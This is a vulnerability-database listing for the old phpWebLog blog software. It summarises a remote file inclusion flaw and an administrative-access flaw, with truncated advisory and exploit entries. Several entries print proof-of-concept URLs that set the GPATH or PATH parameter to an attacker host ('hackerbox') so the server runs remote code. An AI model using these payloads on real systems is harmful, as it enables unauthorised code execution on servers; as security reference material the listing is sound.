EUVD-2001-0088

Malware in sbrugna...

EUVD-2005-0699

Malware in sbrugna...

CVE-2005-0698

PHP remote file inclusion vulnerability in PHPWebLog 0.5.3 and earlier allows remote attackers to execute arbitrary PHP code by modifying the 1 GPATH parameter to init.inc.php or the 2 PATH parameter to index.php to reference a URL on a remote web server that contains the code...

phpWebLog <= 0.5.3 arbitrary file inclusion (VXSfx)

-- == -- == -- == -- == -- == -- == -- == -- == -- == -- Name: phpWebLog Version: = 0.5.3 Homepage: http://phpweblog.org/ Author: Filip Groszynski VXSfx Date: 7 March 2005 -- == -- == -- == -- == -- == -- == -- == -- == -- == -- Vulnerable code in include/init.inc.php: ... Allowed HTML tags in...

CVE-2005-0698

PHP remote file inclusion vulnerability in PHPWebLog 0.5.3 and earlier allows remote attackers to execute arbitrary PHP code by modifying the 1 GPATH parameter to init.inc.php or the 2 PATH parameter to index.php to reference a URL on a remote web server that contains the code...

Jason Hines PHPWebLog 0.40.5 - Remote File Inclusion

Jason Hines PHPWebLog 0.40.5 - Remote File Inclusion source: https://www.securityfocus.com/bid/12747/info phpWebLog is prone to remote file include vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied input prior to using it in a PHP 'includeonce'...

phpWebLog 0.5.3 - Arbitrary File Inclusion

Example: if registerglobals=on and allowurlfopen=on: http://victim/dir/include/init.inc.php?GPATH=http://hackerbox/ http://victim/dir/backend/addons/links/index.php?PATH=http://hackerbox/ milw0rm.com 2005-03-07...

phpWebLog 0.5.3 - Arbitrary File Inclusion

phpWebLog 0.5.3 - Arbitrary File Inclusion Example: if registerglobals=on and allowurlfopen=on: http://victim/dir/include/init.inc.php?GPATH=http://hackerbox/ http://victim/dir/backend/addons/links/index.php?PATH=http://hackerbox/ milw0rm.com 2005-03-07...

phpWebLog <= 0.5.3 Arbitrary File Inclusion

Exploit for unknown platform in category web applications =========================================== phpWebLog = 0.5.3 Arbitrary File Inclusion =========================================== Example: if registerglobals=on and allowurlfopen=on:...

Jason Hines PHPWebLog 0.4/0.5 - Remote File Inclusion

source: https://www.securityfocus.com/bid/12747/info phpWebLog is prone to remote file include vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied input prior to using it in a PHP 'includeonce' function call. An attacker may leverage this issue to...

phpWebLog &lt;= 0.5.3 Arbitrary File Inclusion

No description provided by source. Example: if registerglobals=on and allowurlfopen=on: http://victim/dir/include/init.inc.php?GPATH=http://hackerbox/ http://victim/dir/backend/addons/links/index.php?PATH=http://hackerbox/ milw0rm.com 2005-03-07...

CVE-2001-0088

common.inc.php in phpWebLog 0.4.2 does not properly initialize the $CONF array, which inadvertently sets the password to a single character, allowing remote attackers to easily guess the SiteKey and gain administrative privileges to phpWebLog...

Дырка в phpWebLog

Из-за некорректной инициализации переменных пользователь может получить доступ к администрированию...